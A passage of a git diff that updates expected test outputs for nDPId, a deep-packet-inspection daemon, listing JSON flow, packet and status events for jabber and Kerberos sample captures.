+00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":318,"source":"jabber.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1642778258461,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1642778258461,"pkt":"YDjgxTWgeJS0JASgCABFAAAsAABAADQGGi2gLMlmwKgCZBRnku46NBuqnDQZu2ASchBGSwAAAgQFrAAA"} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":319,"source":"jabber.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1642778258465,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1642778258465,"pkt":"eJS0JASgYDjgxTWgCABFAAAod8lAAD8Gl2fAqAJkoCzJZpLuFGecNBm7OjQbq1AQ\/\/\/QEAAA"} +00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":325,"source":"jabber.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1642778258433,"flow_last_seen":1642778258598,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":289,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1642778258598,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.201.102","src_port":37614,"dst_port":5223,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"Jabber","breed":"Acceptable","category":"Web"}} +00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":327,"source":"jabber.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1642668994159,"flow_last_seen":1642669300354,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":419,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1642778258609,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.201.102","src_port":34218,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Jabber","breed":"Acceptable","category":"Web"}} +00557{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":332,"source":"jabber.pcap","alias":"nDPId-test","packets-captured":332,"packets-processed":313,"total-skipped-flows":0,"total-l4-payload-len":37207,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":9,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":9,"total-idle-flows":8,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":61,"global_ts_msec":1643022225544} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":332,"source":"jabber.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1643022225544,"flow_last_seen":1643022225544,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1643022225544,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.201.102","src_port":58388,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":332,"source":"jabber.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1643022225544,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1643022225544,"pkt":"eJS0JASgYDjgxTWgCABFAAA8zN5AAD8GQj7AqAJkoCzJZuQUFGd9pY4kAAAAAKAC\/\/92oQAAAgQFtAQCCAoAzZ+rAAAAAAEDAwg="} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":333,"source":"jabber.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1643022225570,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1643022225570,"pkt":"YDjgxTWgeJS0JASgCABFAAAsAABAADQGGi2gLMlmwKgCZBRn5BT7kgHsfaWOJWASchD3qAAAAgQFrAAA"} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":334,"source":"jabber.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1643022225781,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1643022225781,"pkt":"eJS0JASgYDjgxTWgCABFAAAozN9AAD8GQlHAqAJkoCzJZuQUFGd9pY4l+5IB7VAQ\/\/+BbgAA"} +00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":340,"source":"jabber.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1643022225544,"flow_last_seen":1643022225994,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":289,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1643022225994,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.201.102","src_port":58388,"dst_port":5223,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"Jabber","breed":"Acceptable","category":"Web"}} +00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":342,"source":"jabber.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1642778258433,"flow_last_seen":1642778652221,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":419,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1643022226078,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.201.102","src_port":37614,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Jabber","breed":"Acceptable","category":"Web"}} +00559{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":347,"source":"jabber.pcap","alias":"nDPId-test","packets-captured":347,"packets-processed":328,"total-skipped-flows":0,"total-l4-payload-len":37629,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":10,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":10,"total-idle-flows":9,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":68,"global_ts_msec":1644679789249} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":347,"source":"jabber.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1644679789249,"flow_last_seen":1644679789249,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1644679789249,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.201.102","src_port":41420,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":347,"source":"jabber.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1644679789249,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1644679789249,"pkt":"eJS0JASgYDjgxTWgCABFAAA86SVAAD8GJffAqAJkoCzJZqHMFGfTtLH2AAAAAKAC\/\/\/oLAAAAgQFtAQCCAoAcfbiAAAAAAEDAwg="} +00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":348,"source":"jabber.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1644679789279,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1644679789279,"pkt":"YDjgxTWgeJS0JASgCABFAAAsAABAADQGGi2gLMlmwKgCZBRnocwJMPUa07Sx92ASchC\/QwAAAgQFrAAA"} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":349,"source":"jabber.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1644679789281,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1644679789281,"pkt":"eJS0JASgYDjgxTWgCABFAAAo6SZAAD8GJgrAqAJkoCzJZqHMFGfTtLH3CTD1G1AQ\/\/9JCQAA"} +00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":357,"source":"jabber.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1644679789249,"flow_last_seen":1644679789719,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":337,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1644679789719,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.201.102","src_port":41420,"dst_port":5223,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"Jabber","breed":"Acceptable","category":"Web"}} +00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":361,"source":"jabber.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1643022225544,"flow_last_seen":1643022526197,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":422,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1644679789757,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.201.102","src_port":58388,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Jabber","breed":"Acceptable","category":"Web"}} +00560{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":362,"source":"jabber.pcap","alias":"nDPId-test","packets-captured":362,"packets-processed":343,"total-skipped-flows":0,"total-l4-payload-len":38037,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":11,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":11,"total-idle-flows":10,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":75,"global_ts_msec":1655985683694} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":362,"source":"jabber.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655985683694,"flow_last_seen":1655985683694,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655985683694,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.201.102","src_port":34070,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":362,"source":"jabber.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1655985683694,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655985683694,"pkt":"eJS0JASgYDjgxTWgCABFAAA8eV5AAD8Glb7AqAJkoCzJZoUWFGfmtmUZAAAAAKAC\/\/8wrwAAAgQFtAQCCAoAZQT+AAAAAAEDAwg="} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":363,"source":"jabber.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1655985683717,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1655985683717,"pkt":"YDjgxTWgeJS0JASgCABFAAAwAABAADQGGimgLMlmwKgCZBRnhRZwZZi25rZlGnASchD1\/AAAAgQFrAEBBAI="} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":364,"source":"jabber.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1655985683721,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1655985683721,"pkt":"eJS0JASgYDjgxTWgCABFAAAoeV9AAD8GldHAqAJkoCzJZoUWFGfmtmUacGWYt1AQ\/\/+UyQAA"} +00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":370,"source":"jabber.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1655985683694,"flow_last_seen":1655985683872,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":289,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1655985683872,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.201.102","src_port":34070,"dst_port":5223,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"Jabber","breed":"Acceptable","category":"Web"}} +00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":375,"source":"jabber.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1644679789249,"flow_last_seen":1644679824897,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":408,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1655985690292,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.201.102","src_port":41420,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Jabber","breed":"Acceptable","category":"Web"}} +00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":376,"source":"jabber.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1655985683694,"flow_last_seen":1655985963406,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":419,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1655985963406,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.201.102","src_port":34070,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Jabber","breed":"Acceptable","category":"Web"}} +00562{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":376,"source":"jabber.pcap","alias":"nDPId-test","packets-captured":376,"packets-processed":358,"total-skipped-flows":0,"total-l4-payload-len":38456,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":12,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":12,"total-idle-flows":12,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":83,"global_ts_msec":1655985963406} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ -~~ packets captured/processed: 13/13 +~~ packets captured/processed: 376/358 ~~ skipped flows.............: 0 -~~ total layer4 data length..: 157 bytes -~~ total detected protocols..: 1 -~~ total active/idle flows...: 1/1 +~~ total layer4 data length..: 38456 bytes +~~ total detected protocols..: 12 +~~ total active/idle flows...: 12/12 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5871868 bytes -~~ total memory freed........: 5871868 bytes -~~ total allocations/frees...: 118128/118128 +~~ total memory allocated....: 6049695 bytes +~~ total memory freed........: 6049695 bytes +~~ total allocations/frees...: 121290/121290 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ json string min len.......: 460 chars -~~ json string max len.......: 683 chars -~~ json string avg len.......: 560 chars +~~ json string min len.......: 457 chars +~~ json string max len.......: 1017 chars +~~ json string avg len.......: 737 chars diff --git a/test/results/kerberos-error.pcap.out b/test/results/kerberos-error.pcap.out new file mode 100644 index 000000000..46151b5bb --- /dev/null +++ b/test/results/kerberos-error.pcap.out @@ -0,0 +1,23 @@ +00465{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"kerberos-error.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} +00554{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"kerberos-error.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1645515964250} +00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"kerberos-error.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1645515964250,"flow_last_seen":1645515964250,"flow_idle_time":200000,"flow_min_l4_payload_len":287,"flow_max_l4_payload_len":287,"flow_tot_l4_payload_len":287,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1645515964250,"l3_proto":"ip4","src_ip":"148.151.79.183","dst_ip":"144.199.10.233","src_port":34473,"dst_port":88,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} +00829{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"kerberos-error.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1645515964250,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":333,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":333,"pkt_l4_len":295,"thread_ts_msec":1645515964250,"pkt":"AAAAAAAAAAwAAAAIgQAH2AgARQABO06GQAA5EXItlJdPt5DHCumGqQBYASfB3GqCARswggEXoQMCAQWiAwIBCqNYMFYwSKEDAgECokEEPzA9oAMCAReiNgQ0tg4LUF+YEEIG9iUDuODnyC2ELm8B5cfw4VQNHqTH6JGB5paR4MQdd1ZJvX+lrEsYdKkZFTAKoQQCAgCVogIEAKSBsDCBraAHAwUAAIEAAKEfMB2gAwIBAaEWMBQbBGhvc3QbDG11cy1uLWNqMDcwOaIRGw9MSU5VWC5TSEVMTC5DT02jJDAioAMCAQKhGzAZGwZrcmJ0Z3QbD0xJTlVYLlNIRUxMLkNPTaURGA8yMDIyMDIyMzA3NDYwM1qmERgPMjAyMjAzMDQwNzQ2MDNapwYCBEeh+pmoGjAYAgEXAgESAgERAgEUAgETAgEQAgEZAgEa"} +00735{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"kerberos-error.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1645515964250,"flow_last_seen":1645515964250,"flow_idle_time":200000,"flow_min_l4_payload_len":287,"flow_max_l4_payload_len":287,"flow_tot_l4_payload_len":287,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1645515964250,"l3_proto":"ip4","src_ip":"148.151.79.183","dst_ip":"144.199.10.233","src_port":34473,"dst_port":88,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"linux.shell.com","username":"mus-n-cj0709"}} +00585{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"kerberos-error.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1645515964609,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":148,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":148,"pkt_l4_len":110,"thread_ts_msec":1645515964609,"pkt":"AAAAAAAAAAwAAAAIgQAH2AgARQAAgkf1AABzEX93kMcK6ZSXT7cAWIapAG6BuH5kMGKgAwIBBaEDAgEepBEYDzIwMjIwMjIyMDc0NjA0WqUFAgMOwm2mAwIBNKkRGw9MSU5VWC5TSEVMTC5DT02qJDAioAMCAQKhGzAZGwZrcmJ0Z3QbD0xJTlVYLlNIRUxMLkNPTQ=="} +00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2,"source":"kerberos-error.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1645515964250,"flow_last_seen":1645515964609,"flow_idle_time":200000,"flow_min_l4_payload_len":102,"flow_max_l4_payload_len":287,"flow_tot_l4_payload_len":389,"flow_avg_l4_payload_len":194,"midstream":0,"thread_ts_msec":1645515964609,"l3_proto":"ip4","src_ip":"148.151.79.183","dst_ip":"144.199.10.233","src_port":34473,"dst_port":88,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"}} +00558{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":2,"source":"kerberos-error.pcap","alias":"nDPId-test","packets-captured":2,"packets-processed":2,"total-skipped-flows":0,"total-l4-payload-len":389,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":8,"global_ts_msec":1645515964609} +~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ +~~ packets captured/processed: 2/2 +~~ skipped flows.............: 0 +~~ total layer4 data length..: 389 bytes +~~ total detected protocols..: 1 +~~ total active/idle flows...: 1/1 +~~ total timeout flows.......: 0 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~ total memory allocated....: 6003135 bytes +~~ total memory freed........: 6003135 bytes +~~ total allocations/frees...: 120878/120878 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~ json string min len.......: 470 chars +~~ json string max len.......: 834 chars +~~ json string avg len.......: 645 chars diff --git a/test/results/kerberos-login.pcap.out b/test/results/kerberos-login.pcap.out index 6c6d9528a..ae6734aac 100644 --- a/test/results/kerberos-login.pcap.out +++ b/test/results/kerberos-login.pcap.out @@ -2,72 +2,72 @@ 00553{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"kerberos-login.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":946716066779} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946716066779,"flow_last_seen":946716066779,"flow_idle_time":200000,"flow_min_l4_payload_len":1211,"flow_max_l4_payload_len":1211,"flow_tot_l4_payload_len":1211,"flow_avg_l4_payload_len":1211,"midstream":0,"thread_ts_msec":946716066779,"l3_proto":"ip4","src_ip":"10.1.12.2","dst_ip":"10.5.3.1","src_port":1061,"dst_port":88,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02075{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":946716066779,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1253,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1253,"pkt_l4_len":1219,"thread_ts_msec":946716066779,"pkt":"AAP\/pqsMAAP\/p6sMCABFAATXAJUAAIAREnkKAQwCCgUDAQQlAFgEw4XHbIIEtzCCBLOhAwIBBaIDAgEMo4IEMTCCBC0wggQpoQMCAQGiggQgBIIEHG6CBBgwggQUoAMCAQWhAwIBDqIHAwUAAAAAAKOCA2xhggNoMIIDZKADAgEFoQwbCkRFTllEQy5DT02iHzAdoAMCAQKhFjAUGwZrcmJ0Z3QbCkRFTllEQy5DT02jggMsMIIDKKADAgEXoQMCAQKiggMaBIIDFnaHOkbe3Ft95M1wKu8wrnnL2KoXK50Wfms4lwl+7nIzTWt\/TBTBxetLCu0b6OiVj3UpYznp3lazrMq98Qwi3aS0sEdZBoJs+Etqw0r7qbOiqGfIzfY5WW7lW95ehl68DOwN7G\/ctJKk8AVM30BgdXD8tz49IVb5LvH8kWVdyLTL7dDroB1zpLEnsskNCGiPKC2kvI4rVQFX\/skMLVm0vrv\/AnhykPJFywmuBCVaX4ilWguDR\/hhedFfzOYZ0xf7kVQmFePGaBfPtyf2tWMm316XiQ6a0ddMjedbQTEPUEaIPhU11lAXVTRXuGNNrbinzU88d0vpPunmiXEQ46Zb2aBwhA2PddlJfkphuRTiKTMYIcDx\/1mQSbo6IMs5BzF09EwRlqL20WWEy+tJbg8F96jQFX9ZfusZkqo2\/Ymtt2KIXO2vcTHWCJfKNWi2oHePkmjQVNqV44BDHKJhg2yYGzOpsCLcIH9xI3jIsbhcV3lnOJelJiIh\/BOztlBncxQJDGM8Ss5lpzuieNTaBQOQBzYsANr2gDw7i5E2tKUZxxU28uYbVQUK6KZjtJp0woRjxeXkug7EiwanRJ+ruwFN4641BrWk2WV7znZLMnOxd9Ixgq276dbW3uk8XghmBk5iO9uBY9B6bl2XBCrn0zJxWO550J7YNhBLCWnZolKhh691S4S\/sMyb9cBhQt9YOq11SPy9kRuQfEqcmeMSn67AgOzJ8mzxQ8a3rs4hfqkn1jH+UhGi1xla+MUNFmVkVcF\/s3a9sERXKT\/GEeYJDkvNw+esHfCK4jalR0pA558BA3fanPrnNu74qdrmsUgOhPibVBiVBOhTvitLl0hsJU5z6U77MFSX4UMd9nw2kPOVPhabSvF2baihVP5t9x+qShNJPWM56UisG6Ab7JzsId2uQf1lTt49iVnnhmjdWddhTtm47iqqL0nJrz7QZtWxYyMQTTtuJpTJCO76PmTywwSdY3tKlhuq3MxMZlzDeglX6VXTiBXGqdqJOfHm8VsI+LTATS2a9Dxo3ZxAgK9aL5NMKTnSmEBKpJmkgY4wgYugAwIBA6KBgwSBgGCx7fTnQzvvnXnzi9LJ0rtprAMBwPNDorbgvJI4BV8TZb2vtoAMBvn\/H0kv3attbzNMWzuI4cmR96epkzzc9Em+P1ZASZGSdvfOcM7pYzUfVYcU+almrfJGc226OPAiNqdT5WqhctEEk6M\/WBsVhSCIKFwQ0F6xriZzYptSncn2pHIwcKAHAwUAQIAAAKIMGwpERU5ZREMuQ09NoyEwH6ADAgEDoRgwFhsEaG9zdBsOeHAxLmRlbnlkYy5jb22lERgPMjAzNzA5MTMwMjQ4MDVapwYCBAvCgSioGTAXAgEXAgL\/ewIBgAIBAwIBAQIBGAIC\/3k="} 